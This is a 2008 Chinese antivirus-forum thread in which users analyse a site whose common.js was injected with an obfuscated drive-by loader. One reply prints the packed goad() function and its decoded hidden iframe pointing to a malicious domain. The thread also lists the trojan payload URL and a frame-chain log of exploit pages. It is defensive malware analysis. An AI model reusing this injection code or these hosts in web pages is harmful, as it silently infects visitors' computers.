查看: 3568|回复: 17
收起左侧

[已鉴定] 一起看吧被google怀疑挂马。

 关闭 [复制链接]
chenpatrick
发表于 2008-11-11 02:18:51 | 显示全部楼层 |阅读模式
我用firefox进www.17look8.com/bbs,WOT这个工具提醒我说,该网站怀疑被挂马。我的kis2009没反映,但是,我朋友的金山报警了。请检测。
wjp01234
发表于 2008-11-11 02:23:27 | 显示全部楼层
红伞报D:\Temporary Internet Files\Content.IE5\6JAMHMWN\beng[1].htm
HEUR/HTML.Malware
dikex
发表于 2008-11-11 03:28:14 | 显示全部楼层
隐蔽的挂马,问题在http://www.17look8.com/bbs/include/javascript/common.js,在文件中被加入了一个函数goad()

  1. function goad(){var Then = new Date()
  2. Then.setTime(Then.getTime() + 24*60*60*1000)
  3. var cookieString = new String(document.cookie)
  4. var cookieHeader = "Cookie1="
  5. var beginPosition = cookieString.indexOf(cookieHeader)
  6. if (beginPosition != -1){ } else { document.cookie = "Cookie1=Filter;expires="+ Then.toGMTString()
  7. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.d(\'<7 4=0 c=1 a="6://9.2/8/b.5"></7>\')',62,14,'|100|cn|document|height|htm|http|iframe|images|google-anlacc|src|beng|width|writeln'.split('|'),0,{}));window.status="U+FFFDU+FFFDU+FFFD";}}goad();

复制代码


设置cookie,有效期一天,期间不再进行挂马操作
解开加密段后:<iframe height=0 width=100 src="http://google-anlacc.cn/images/beng.htm"></iframe>

毒为:http://59.34.197.63/exe1/ms.cs

另外其实Google的提示有相对滞后性
西风萧雨
发表于 2008-11-11 08:12:32 | 显示全部楼层

的确是被挂,又是利用ADOBE漏洞的~~

1.jpg
施老2005
发表于 2008-11-11 08:24:28 | 显示全部楼层
楼上几位都是高手。
lg560852
发表于 2008-11-11 08:47:35 | 显示全部楼层
哦,放中间了。

[ 本帖最后由 lg560852 于 2008-11-11 08:48 编辑 ]
icka
发表于 2008-11-11 08:49:47 | 显示全部楼层
病毒: Trojan-Dropper.Win32.Agent.yjl (KAV 引擎), Trojan.Downloader.JLCQ (BD 引擎)
lg560852
发表于 2008-11-11 09:00:23 | 显示全部楼层
Log is generated by FreShow.
[wide]http://google-anlacc.cn/images/beng.htm
    [frame]http://baidu-bai9.cn/b082222/b08.htm
        [frame]http://baidu-bai9.cn/b082222/new.html
            [frame]http://baidu-bai9.cn/b082222/../14.htm
                [object]http://59.34.197.63/exe1/ms.css
            [frame]http://baidu-bai9.cn/b082222/fx.htm
                [frame]http://baidu-bai9.cn/b082222/mlink.html
                [frame]http://baidu-bai9.cn/b082222/xlink.html
            [frame]http://baidu-bai9.cn/b082222/../as.htm
                [frame]http://baidu-bai9.cn/b082222/../ce.htm
                    [object]http://59.34.197.63/exe1/ce.css
                [object]http://59.34.197.63/exe1/ce.css
            [frame]http://baidu-bai9.cn/b082222/lzz.htm
                [object]http://59.34.197.63/exe1/b08.css
            [frame]http://baidu-bai9.cn/b082222/real11.htm
                [object]http://59.34.197.63/exe1/b08.css
            [frame]http://baidu-bai9.cn/b082222/../real10.htm
                [object]http://59.34.197.63/exe1/re.css
            [frame]http://baidu-bai9.cn/b082222/../Bfyy.htm
                [object]http://59.34.197.63/exe1/bf.css
acergelff
头像被屏蔽
发表于 2008-11-11 09:43:12 | 显示全部楼层
原帖由 西风萧雨 于 2008-11-11 08:12 发表
396712


请问这个历史安全记录是哪个软件???
baerzake
发表于 2008-11-11 09:45:20 | 显示全部楼层
火狐已经屏蔽了此网站
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 06:53 , Processed in 0.134882 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表